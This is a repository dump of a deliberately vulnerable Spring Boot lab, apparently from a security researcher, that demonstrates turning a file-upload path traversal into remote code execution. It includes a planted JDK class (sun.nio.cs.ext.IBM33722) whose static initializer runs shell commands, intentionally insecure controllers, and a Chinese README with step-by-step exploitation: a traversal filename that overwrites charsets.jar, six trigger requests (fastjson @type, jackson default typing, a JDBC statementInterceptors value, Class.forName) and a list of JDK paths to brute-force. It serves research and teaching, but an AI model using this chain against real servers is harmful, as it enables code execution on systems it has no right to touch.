├── charsets ├── src │ ├── META-INF │ │ └── MANIFEST.MF │ └── sun │ │ └── nio │ │ └── cs │ │ └── ext │ │ ├── IBM33722.java │ │ └── ExtendedCharsets.java └── pom.xml ├── images └── docker.png ├── release └── charsets.jar ├── fatJarWriteFileRCE ├── src │ └── main │ │ ├── resources │ │ ├── application.properties │ │ ├── templates │ │ │ ├── uploadStatus.html │ │ │ ├── upload.html │ │ │ └── index.html │ │ └── static │ │ │ └── jquery.form.min.js │ │ ├── docker │ │ └── Dockerfile │ │ └── java │ │ └── code │ │ └── landgrey │ │ ├── controller │ │ ├── IndexController.java │ │ ├── HelloController.java │ │ ├── ClassForNameController.java │ │ ├── JdbcController.java │ │ ├── ClassLoaderController.java │ │ ├── FastJsonController.java │ │ ├── ListFileController.java │ │ ├── JackSonController.java │ │ └── UploadController.java │ │ ├── Application.java │ │ └── bean │ │ ├── Car.java │ │ └── User.java └── pom.xml ├── .gitignore └── README.md /charsets/src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.7.0_07 (Oracle Corporation) 3 | 4 | -------------------------------------------------------------------------------- /images/docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/HEAD/images/docker.png -------------------------------------------------------------------------------- /release/charsets.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/HEAD/release/charsets.jar -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=18081 2 | server.address=0.0.0.0 3 | 
4 | spring.servlet.multipart.max-file-size=10MB 5 | spring.servlet.multipart.max-request-size=10MB 6 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM openjdk:8-jdk-alpine 2 | VOLUME /tmp 3 | ADD ./fatJarWriteFileRCE-1.0-SNAPSHOT.jar /app.jar 4 | EXPOSE 18081 5 | ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar","/app.jar"] 6 | MAINTAINER LandGrey 7 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/templates/uploadStatus.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

文件上传结果

6 | 7 |
8 |

9 |

10 | 11 | 12 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/IndexController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | 6 | @Controller 7 | public class IndexController { 8 | @GetMapping("/") 9 | public String index(){ 10 | return "index"; 11 | } 12 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/Application.java: -------------------------------------------------------------------------------- 1 | package code.landgrey; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Application { 8 | public static void main(String[] args){ 9 | 10 | SpringApplication.run(Application.class,args); 11 | 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /charsets/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | code.landgrey 7 | charsets 8 | pom 9 | 10 | 1.0-SNAPSHOT 11 | 12 | 4.0.0 13 | 14 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # 2 | .idea/ 3 | target/ 4 | charsets/.idea/ 5 | 6 | 7 | # Compiled class file 8 | *.class 9 | 10 | # Log file 11 | *.log 12 | 13 | # BlueJ files 14 | *.ctxt 15 | 16 | # Mobile Tools for Java (J2ME) 17 | .mtj.tmp/ 18 | 19 | # Package Files # 20 | *.war 21 | *.nar 22 | *.ear 23 | *.zip 24 | *.tar.gz 25 | *.rar 26 | 27 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml 28 
| hs_err_pid* 29 | *.iml 30 | fatJarWriteFileRCE/src/main/java/code/landgrey/test/test.java 31 | charsets/src/charsets.jar 32 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/HelloController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | @RestController 8 | public class HelloController { 9 | @RequestMapping("/hello") 10 | public String hello(String name){ 11 | if(name == null){ 12 | name = "world"; 13 | } 14 | return "hello " + name + " !"; 15 | } 16 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/templates/upload.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

文件上传

6 | 7 |
8 | 9 |
10 |

11 | 12 |
13 | 14 |
15 | 18 | 19 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/ClassForNameController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | @RestController 8 | @EnableAutoConfiguration 9 | public class ClassForNameController { 10 | /** Handles /classForName: loads the class named by the request parameter {@code name} (default {@code code.landgrey.bean.Car}) and returns the {@code toString()} of a new no-arg instance. SECURITY: {@code name} is caller-controlled and unvalidated, so a request can force initialization and instantiation of any class the loader can resolve; a hardened handler would map the parameter onto a fixed allow-list of classes instead of passing it to {@code Class.forName}. @throws Exception if the class cannot be found or instantiated */ @RequestMapping("/classForName") 11 | public String classForName(String name) throws Exception { 12 | if(name == null){ 13 | name = "code.landgrey.bean.Car"; 14 | } 15 | /* Class.forName(String) also initializes the class, so its static initializer runs before newInstance() is reached. */ Class clazz = Class.forName(name); 16 | return "you got a " + name + " : =[" + clazz.newInstance().toString() + "]="; 17 | } 18 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/JdbcController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.web.bind.annotation.GetMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | import java.sql.DriverManager; 6 | 7 | @RestController 8 | public class JdbcController { 9 | /** Handles GET /jdbc: sets a 10-second login timeout, loads {@code com.mysql.jdbc.Driver} and opens a connection to the request-supplied {@code url}. Returns a fixed success or failure string; any Throwable is printed and reported as failure. SECURITY: the full JDBC URL, including its connection properties, comes from the caller, so the client picks the target host and every driver option; a hardened handler would build the URL server-side from fixed configuration. */ @GetMapping("/jdbc") 10 | public String JdbcTest(String url){ 11 | try{ 12 | DriverManager.setLoginTimeout(10); 13 | Class.forName("com.mysql.jdbc.Driver"); 14 | /* The Connection returned here is discarded and never closed. */ DriverManager.getConnection(url); 15 | }catch (Throwable t){ 16 | t.printStackTrace(); 17 | return "jdbc connection failed!"; 18 | } 19 | 20 | return "jdbc connection success!"; 21 | } 22 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/ClassLoaderController.java:
-------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | @RestController 8 | @EnableAutoConfiguration 9 | public class ClassLoaderController { 10 | /** Handles /classLoader (the method is named classForName but does not call Class.forName): loads the class named by the request parameter {@code name} (default {@code code.landgrey.bean.User}) through the thread context class loader and returns the {@code toString()} of a new no-arg instance. SECURITY: {@code name} is caller-controlled and unvalidated, so a request can instantiate any class that loader can resolve; a hardened handler would map the parameter onto a fixed allow-list of classes. @throws Exception if the class cannot be found or instantiated */ @RequestMapping("/classLoader") 11 | public String classForName(String name) throws Exception { 12 | if(name == null){ 13 | name = "code.landgrey.bean.User"; 14 | } 15 | /* loadClass() does not initialize the class; initialization happens at newInstance() on the next line. */ Class clazz = Thread.currentThread().getContextClassLoader().loadClass(name); 16 | return "you got a " + name + " : =[" + clazz.newInstance().toString() + "]="; 17 | } 18 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/FastJsonController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 5 | import org.springframework.web.bind.annotation.RequestBody; 6 | import org.springframework.web.bind.annotation.RequestMapping; 7 | import org.springframework.web.bind.annotation.RequestMethod; 8 | import org.springframework.web.bind.annotation.RestController; 9 | 10 | @RestController 11 | @EnableAutoConfiguration 12 | public class FastJsonController { 13 | /** Handles POST /fastjson: parses the raw request body with fastjson's untyped {@code JSON.parse} and returns the result's {@code toString()}. SECURITY: the body is untrusted, and untyped parsing lets the input carry {@code @type} hints that select which classes fastjson resolves; for untrusted input enable fastjson safeMode or parse into a fixed target type. NOTE(review): a body of literal {@code null} presumably leaves {@code o} null so that {@code toString()} throws; confirm. */ @RequestMapping(path="/fastjson", method = RequestMethod.POST, produces = "application/json") 14 | public String testFastJson(@RequestBody String json){ 15 | Object o = JSON.parse(json); 16 | return o.toString(); 17 | } 18 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/ListFileController.java:
-------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.web.bind.annotation.GetMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class ListFileController { 8 | @GetMapping("/listFile") 9 | public String listFile() throws Throwable{ 10 | String rs = "/tmp 目录文件列表:
===============================
"; 11 | String line; 12 | java.lang.Process proc = java.lang.Runtime.getRuntime().exec("ls -lt /tmp/"); 13 | java.io.InputStream in = proc.getInputStream(); 14 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(in, "UTF-8")); 15 | while( (line = br.readLine()) != null){ 16 | rs += line + "
"; 17 | } 18 | return rs; 19 | } 20 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/bean/Car.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.bean; 2 | 3 | 4 | public class Car{ 5 | private String brand; 6 | private long price; 7 | 8 | public Car(){ 9 | 10 | } 11 | 12 | public Car(String brand){ 13 | this.brand = brand; 14 | } 15 | 16 | public Car(String brand, long price){ 17 | this.brand = brand; 18 | this.price = price; 19 | } 20 | 21 | public long getPrice() { 22 | return price; 23 | } 24 | 25 | public String getBrand() { 26 | return brand; 27 | } 28 | 29 | public void setBrand(String brand) { 30 | this.brand = brand; 31 | } 32 | 33 | public void setPrice(long price) { 34 | this.price = price; 35 | } 36 | 37 | @Override 38 | public String toString() { 39 | return " [brand: '" + brand + "', price: '" + price + "'] "; 40 | } 41 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/JackSonController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import code.landgrey.bean.User; 4 | import com.fasterxml.jackson.core.JsonProcessingException; 5 | import com.fasterxml.jackson.databind.ObjectMapper; 6 | import org.springframework.beans.factory.annotation.Autowired; 7 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 8 | import org.springframework.web.bind.annotation.RequestBody; 9 | import org.springframework.web.bind.annotation.RequestMapping; 10 | import org.springframework.web.bind.annotation.RequestMethod; 11 | import org.springframework.web.bind.annotation.RestController; 12 | 13 | @RestController 14 | @EnableAutoConfiguration 15 | public class JackSonController { 16 | @Autowired 17 | private ObjectMapper objectMapper; 18 | 
19 | /** Handles POST /jackson: enables default typing on the injected ObjectMapper, deserializes the raw body as {@code Object} and returns its {@code toString()}. SECURITY: with default typing the JSON itself names the class to instantiate, so untrusted bodies must not reach a mapper configured this way; if polymorphic input is required, use {@code activateDefaultTyping} with a restrictive {@code PolymorphicTypeValidator}, or explicit {@code @JsonTypeInfo} on known subtypes. */ @RequestMapping(path="/jackson", method = RequestMethod.POST) 20 | public String testJackSon(@RequestBody String json) throws Throwable { 21 | /* Mutates the autowired mapper on every request. NOTE(review): if this is the application-wide ObjectMapper bean, the setting applies to every other user of it; confirm. */ objectMapper.enableDefaultTyping(); 22 | Object o = objectMapper.readValue(json, Object.class); 23 | return o.toString(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /charsets/src/sun/nio/cs/ext/IBM33722.java: -------------------------------------------------------------------------------- 1 | package sun.nio.cs.ext; 2 | 3 | import java.util.UUID; 4 | 5 | 6 | /** Demonstration class declared under the name {@code sun.nio.cs.ext.IBM33722}. Both the static initializer and the constructor call {@code fun()}, so the marker command runs when the class is initialized and again on each instantiation. */ public class IBM33722 { 7 | static { 8 | fun(); 9 | } 10 | 11 | public IBM33722(){ 12 | fun(); 13 | } 14 | 15 | /** Spawns one fixed, OS-dependent marker command and always returns {@code null}. On macOS and Windows it opens the calculator; elsewhere it touches {@code /tmp/charsets_test_XXXXXXXX.log}, where the suffix is 8 hex characters taken from a random UUID. For defenders the observable artifacts are a shell child process of the JVM and that marker file. Failures to start the process are only printed via {@code printStackTrace()}. */ private static java.util.HashMap fun(){ 16 | String[] command; 17 | String random = UUID.randomUUID().toString().replace("-","").substring(1,9); 18 | String osName = System.getProperty("os.name"); 19 | if (osName.startsWith("Mac OS")) { 20 | command = new String[]{"/bin/bash", "-c", "open -a Calculator"}; 21 | } else if (osName.startsWith("Windows")) { 22 | command = new String[]{"cmd.exe", "/c", "calc"}; 23 | } else { 24 | if(new java.io.File("/bin/bash").exists()){ 25 | command = new String[]{"/bin/bash", "-c", "touch /tmp/charsets_test_" + random + ".log"}; 26 | }else{ 27 | command = new String[]{"/bin/sh", "-c", "touch /tmp/charsets_test_" + random + ".log"}; 28 | } 29 | } 30 | try{ 31 | java.lang.Runtime.getRuntime().exec(command); 32 | }catch (Throwable e1){ 33 | e1.printStackTrace(); 34 | } 35 | return null; 36 | } 37 | 38 | 39 | } 40 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/bean/User.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.bean; 2 | 3 | public class User { 4 | private String name; 5 | private Integer age; 6 | private Car car; 7 | private Object secret; 8 | 9 | public User(){ 10 | 11 | } 12 | 13 | public User(String name){ 14 |
this.name = name; 15 | } 16 | 17 | public void setName(String name) { 18 | this.name = name; 19 | } 20 | 21 | public String getName() { 22 | return name; 23 | } 24 | 25 | public void setAge(Integer age) { 26 | this.age = age; 27 | } 28 | 29 | public Integer getAge() { 30 | return age; 31 | } 32 | 33 | public void setCar(Car car) { 34 | this.car = car; 35 | } 36 | 37 | public Car getCar() { 38 | return car; 39 | } 40 | 41 | public Object getSecret() { 42 | return secret; 43 | } 44 | 45 | public void setSecret(Object secret) { 46 | this.secret = secret; 47 | } 48 | 49 | @Override 50 | public String toString() { 51 | if(car != null && secret != null){ 52 | return "name: '" + name + "', age: '" + age + "', car: '" + car.toString() + "', secret: '" + secret.toString() + "'"; 53 | } 54 | return "name: '" + name + "', age: '" + age + "'"; 55 | } 56 | 57 | } 58 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

SpringBoot FatJar 文件上传漏洞到 RCE

4 | 5 |
6 |

系统功能:

7 |
8 | 12 |
13 | 14 |
15 |

源码及参考:

16 |
17 | https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks 18 |
19 | 20 |
21 | 24 | 25 | 28 | 29 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/UploadController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | import org.springframework.web.bind.annotation.PostMapping; 6 | import org.springframework.web.bind.annotation.RequestParam; 7 | import org.springframework.web.multipart.MultipartFile; 8 | import org.springframework.web.servlet.mvc.support.RedirectAttributes; 9 | 10 | import java.io.IOException; 11 | import java.nio.file.Files; 12 | import java.nio.file.Path; 13 | import java.nio.file.Paths; 14 | 15 | @Controller 16 | public class UploadController { 17 | /** Serves the upload form view named "upload". */ @GetMapping("/uploadIndex") 18 | public String uploadPage(){ 19 | return "upload"; 20 | } 21 | 22 | /** Serves the result view named "uploadStatus". */ @GetMapping("/uploadStatus") 23 | public String uploadStatus() { 24 | return "uploadStatus"; 25 | } 26 | 27 | /** Handles POST /upload: writes the uploaded bytes to {@code "/tmp/" + originalFilename} and redirects to the status page with a flash message. SECURITY: {@code getOriginalFilename()} is supplied by the client and is concatenated into the path unchanged, so {@code ../} segments place the file outside /tmp, and {@code Files.write} with its default options replaces an existing file. A hardened handler would keep only the final path component (or use a server-generated name), resolve it against the base directory, normalize, and reject any result that does not start with that base. */ @PostMapping("/upload") 28 | public String singleFileUpload(@RequestParam("file") MultipartFile file, RedirectAttributes redirectAttributes) { 29 | if (file.isEmpty()) { 30 | redirectAttributes.addFlashAttribute("message", "请选择文件上传"); 31 | /* Relative redirect target (no leading slash), unlike the absolute one returned at the end of the method. */ return "redirect:uploadStatus"; 32 | } 33 | 34 | try { 35 | byte[] bytes = file.getBytes(); 36 | /* Client-chosen name joined to the base directory without normalization or containment check. */ Path path = Paths.get("/tmp/" + file.getOriginalFilename()); 37 | Files.write(path, bytes); 38 | 39 | redirectAttributes.addFlashAttribute("message", "上传成功!'" + file.getOriginalFilename() + "'"); 40 | 41 | } catch (IOException e) { 42 | redirectAttributes.addFlashAttribute("message", "Server throw IOException"); 43 | e.printStackTrace(); 44 | } 45 | return "redirect:/uploadStatus"; 46 | } 47 | 48 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/pom.xml:
-------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | code.landgrey 8 | fatJarWriteFileRCE 9 | 1.0-SNAPSHOT 10 | 11 | 12 | org.springframework.boot 13 | spring-boot-starter-parent 14 | 2.2.1.RELEASE 15 | 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.springframework.boot 24 | spring-boot-starter-web 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | org.springframework.boot 40 | spring-boot-starter-thymeleaf 41 | 42 | 43 | 44 | com.alibaba 45 | fastjson 46 | 1.2.76 47 | 48 | 49 | 50 | mysql 51 | mysql-connector-java 52 | 5.1.48 53 | 54 | 55 | 56 | 57 | 58 | 59 | org.springframework.boot 60 | spring-boot-maven-plugin 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## spring-boot-upload-file-lead-to-rce-tricks 2 | 3 | ### 一. 原理文章 4 | 5 | [Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索](https://landgrey.me/blog/22/) 6 | 7 | 8 | 9 | ### 二. docker 漏洞环境搭建 10 | 11 | ``` 12 | docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 13 | docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 14 | ``` 15 | 16 | 17 | 完成后访问 http://127.0.0.1:18081/ ,界面大概如下所示: 18 | 19 | ![](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/raw/main/images/docker.png) 20 | 21 | 22 | 23 | ### 三. docker 漏洞环境的功能 24 | 25 | - 文件上传功能 (默认上传到 /tmp/ 目录,可跳目录) 26 | - 列目录功能 (列出 /tmp/ 目录下文件) 27 | 28 | 29 | 30 | ### 四. 漏洞利用条件 31 | 32 | - 可以获得 jdk 安装的 home 目录位置 33 | - 可参考**附录**常见的 jdk lib 默认目录位置,然后使用字典枚举尝试 34 | 35 | - jdk 自带文件 `/jre/lib/***.jar` 没被 `Opened` 过 36 | - 以 charsets.jar 文件举例:程序代码中不使用 `Charset.forName("GBK")` 类似的调用,默认就不会 `Opened` charsets.jar 文件 37 | - ⚠️ 值得注意的是,只能主动触发一次 `Opened` **.jar 文件,如果漏洞利用没有成功,则同名 jar 文件就不能再利用了 38 | 39 | 40 | 41 | ### 五. 漏洞利用步骤 42 | 43 | 1. 
选择上传文件 [charsets.jar](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/raw/main/release/charsets.jar) 44 | 45 | 2. 使用上传文件功能,上传时用 burpsuite 截住数据包,filename 修改为 `../../usr/lib/jvm/java-1.8-openjdk/jre/lib/charsets.jar` 46 | 47 | 3. 上传成功后使用**漏洞利用场景**里的数据包触发漏洞 48 | 49 | 4. 漏洞触发成功会在 /tmp/ 目录产生 charsets_test_[random-string].log 样式名字的文件 50 | 51 | 5. 最后使用列目录功能查看漏洞利用是否成功 52 | 53 | 54 | 55 | ### 六. 漏洞利用场景:(6 个) 56 | 57 | 欢迎提 issue 补充👏~ 58 | 59 | #### 0. spring 原生场景 60 | 61 | spring 框架自带的一条利用链,细节分析见[参考文章](https://landgrey.me/blog/22/)。 62 | 63 | 触发漏洞数据包: 64 | 65 | ``` 66 | GET / HTTP/1.1 67 | Accept: text/html;charset=GBK 68 | 69 | 70 | ``` 71 | 72 | 73 | 74 | #### 1. fastjson 最新版(目前是 1.2.76)默认配置场景 75 | 76 | 正常数据包: 77 | 78 | ``` 79 | POST /fastjson HTTP/1.1 80 | Content-Type: application/json 81 | 82 | {"name":"test"} 83 | ``` 84 | 85 | 触发漏洞数据包: 86 | 87 | ``` 88 | POST /fastjson HTTP/1.1 89 | Content-Type: application/json 90 | 91 | { 92 | "x":{ 93 | "@type":"java.nio.charset.Charset", 94 | "val":"500" 95 | } 96 | } 97 | ``` 98 | 99 | 100 | 101 | #### 2. jackson 开启 enableDefaultTyping 场景 102 | 103 | 正常数据包: 104 | 105 | ``` 106 | POST /jackson HTTP/1.1 107 | Content-Type: application/json 108 | 109 | ["code.landgrey.bean.User",{"name":"zhangsan","age":20,"car":{"brand":"daben","price":1000000},"secret":"Pas@5w0rd"}] 110 | ``` 111 | 112 | 触发漏洞数据包: 113 | 114 | ``` 115 | POST /jackson HTTP/1.1 116 | Content-Type: application/json 117 | 118 | ["sun.nio.cs.ext.IBM33722",{"x":"y"}] 119 | ``` 120 | 121 | 122 | 123 | #### 3. jdbc url getConnection 场景 124 | 125 | 正常数据包: 126 | 127 | ``` 128 | GET /jdbc?url=jdbc:mysql://127.0.0.1:3306/test?user=root&password=123456 129 | ``` 130 | 131 | 触发漏洞数据包: 132 | 133 | ``` 134 | GET /jdbc?url=jdbc:mysql://127.0.0.1:3306/test?statementInterceptors=sun.nio.cs.ext.IBM33722 135 | ``` 136 | 137 | 138 | 139 | #### 4. 
Class forName 场景 140 | 141 | 正常数据包: 142 | 143 | ``` 144 | GET /classForName?name=code.landgrey.bean.Car 145 | ``` 146 | 147 | 触发漏洞数据包: 148 | 149 | ``` 150 | GET /classForName?name=sun.nio.cs.ext.IBM33722 151 | ``` 152 | 153 | 154 | 155 | #### 5. loadClass newInstance 场景 156 | 157 | 正常数据包: 158 | 159 | ``` 160 | GET /classLoader?name=code.landgrey.bean.User 161 | ``` 162 | 163 | 触发漏洞数据包: 164 | 165 | ``` 166 | GET /classLoader?name=sun.nio.cs.ext.IBM33722 167 | ``` 168 | 169 | 170 | 171 | ### 附录. 常见 JDK lib 目录收集 172 | 173 | 欢迎提 issue 补充👏~ 174 | 175 | ``` 176 | /usr/lib/jvm/jre/lib/ 177 | /usr/local/jdk/jre/lib/ 178 | /usr/local/openjdk-6/lib/ 179 | /usr/local/openjdk-7/lib/ 180 | /usr/local/openjdk-8/lib/ 181 | /usr/lib/jvm/java/jre/lib/ 182 | /usr/lib/jvm/jdk6/jre/lib/ 183 | /usr/lib/jvm/jdk7/jre/lib/ 184 | /usr/lib/jvm/jdk8/jre/lib/ 185 | /usr/lib/jvm/jdk-11.0.3/lib/ 186 | /usr/lib/jvm/jdk1.6/jre/lib/ 187 | /usr/lib/jvm/jdk1.7/jre/lib/ 188 | /usr/lib/jvm/jdk1.8/jre/lib/ 189 | /usr/local/openjdk6/jre/lib/ 190 | /usr/local/openjdk7/jre/lib/ 191 | /usr/local/openjdk8/jre/lib/ 192 | /usr/local/openjdk-6/jre/lib/ 193 | /usr/local/openjdk-7/jre/lib/ 194 | /usr/local/openjdk-8/jre/lib/ 195 | /mnt/jdk/jdk1.8.0_191/jre/lib/ 196 | /usr/lib/jvm/jdk1.6.0/jre/lib/ 197 | /usr/lib/jvm/jdk1.7.0/jre/lib/ 198 | /usr/lib/jvm/jdk1.8.0/jre/lib/ 199 | /usr/java/jdk1.8.0_111/jre/lib/ 200 | /usr/java/jdk1.8.0_121/jre/lib/ 201 | /usr/lib/jvm/java-6-oracle/lib/ 202 | /usr/lib/jvm/java-7-oracle/lib/ 203 | /usr/lib/jvm/java-8-oracle/lib/ 204 | /usr/lib/jvm/java-1.6.0/jre/lib/ 205 | /usr/lib/jvm/java-1.7.0/jre/lib/ 206 | /usr/lib/jvm/java-1.8.0/jre/lib/ 207 | /usr/lib/jvm/jdk1.7.0_51/jre/lib/ 208 | /usr/lib/jvm/jdk1.7.0_76/jre/lib/ 209 | /usr/lib/jvm/jdk1.8.0_60/jre/lib/ 210 | /usr/lib/jvm/jdk1.8.0_66/jre/lib/ 211 | /usr/lib/jvm/jdk1.8.0_74/jre/lib/ 212 | /usr/lib/jvm/jdk1.8.0_91/jre/lib/ 213 | /usr/lib/jvm/oracle_jdk6/jre/lib/ 214 | /usr/lib/jvm/oracle_jdk7/jre/lib/ 215 | 
/usr/lib/jvm/oracle_jdk8/jre/lib/ 216 | /usr/lib/jvm/jdk1.8.0_101/jre/lib/ 217 | /usr/lib/jvm/jdk1.8.0_102/jre/lib/ 218 | /usr/lib/jvm/jdk1.8.0_111/jre/lib/ 219 | /usr/lib/jvm/jdk1.8.0_131/jre/lib/ 220 | /usr/lib/jvm/jdk1.8.0_144/jre/lib/ 221 | /usr/lib/jvm/jdk1.8.0_151/jre/lib/ 222 | /usr/lib/jvm/jdk1.8.0_152/jre/lib/ 223 | /usr/lib/jvm/jdk1.8.0_161/jre/lib/ 224 | /usr/lib/jvm/jdk1.8.0_171/jre/lib/ 225 | /usr/lib/jvm/jdk1.8.0_172/jre/lib/ 226 | /usr/lib/jvm/jdk1.8.0_181/jre/lib/ 227 | /usr/lib/jvm/jdk1.8.0_191/jre/lib/ 228 | /usr/lib/jvm/jdk1.8.0_202/jre/lib/ 229 | /usr/lib/jvm/jdk8u202-b08/jre/lib/ 230 | /usr/lib/jvm/jre-6-oracle-x64/lib/ 231 | /usr/lib/jvm/jre-7-oracle-x64/lib/ 232 | /usr/lib/jvm/jre-8-oracle-x64/lib/ 233 | /usr/lib/jvm/zulu-6-amd64/jre/lib/ 234 | /usr/lib/jvm/zulu-7-amd64/jre/lib/ 235 | /usr/lib/jvm/zulu-8-amd64/jre/lib/ 236 | /usr/lib/jvm/java-6-oracle/jre/lib/ 237 | /usr/lib/jvm/java-7-oracle/jre/lib/ 238 | /usr/lib/jvm/java-8-oracle/jre/lib/ 239 | /usr/jdk/instances/jdk1.6.0/jre/lib/ 240 | /usr/jdk/instances/jdk1.7.0/jre/lib/ 241 | /usr/jdk/instances/jdk1.8.0/jre/lib/ 242 | /usr/lib/jvm/j2re1.6-oracle/jre/lib/ 243 | /usr/lib/jvm/j2re1.7-oracle/jre/lib/ 244 | /usr/lib/jvm/j2re1.8-oracle/jre/lib/ 245 | /usr/lib/jvm/java-1.6.0-sun/jre/lib/ 246 | /usr/lib/jvm/java-1.7.0-sun/jre/lib/ 247 | /usr/lib/jvm/java-1.8.0-sun/jre/lib/ 248 | /usr/lib/jvm/java-6-openjdk/jre/lib/ 249 | /usr/lib/jvm/java-7-openjdk/jre/lib/ 250 | /usr/lib/jvm/java-8-openjdk/jre/lib/ 251 | /usr/lib/jvm/j2sdk1.6-oracle/jre/lib/ 252 | /usr/lib/jvm/j2sdk1.7-oracle/jre/lib/ 253 | /usr/lib/jvm/j2sdk1.8-oracle/jre/lib/ 254 | /usr/lib/jvm/java-11-openjdk/jre/lib/ 255 | /usr/lib/jvm/java-12-openjdk/jre/lib/ 256 | /usr/lib/jvm/java-13-openjdk/jre/lib/ 257 | /usr/lib/jvm/java-1.6-openjdk/jre/lib/ 258 | /usr/lib/jvm/java-1.7-openjdk/jre/lib/ 259 | /usr/lib/jvm/java-1.8-openjdk/jre/lib/ 260 | /usr/lib/jvm/java-9-openjdk-amd64/lib/ 261 | /usr/lib/jvm/jdk-6-oracle-x64/jre/lib/ 262 | 
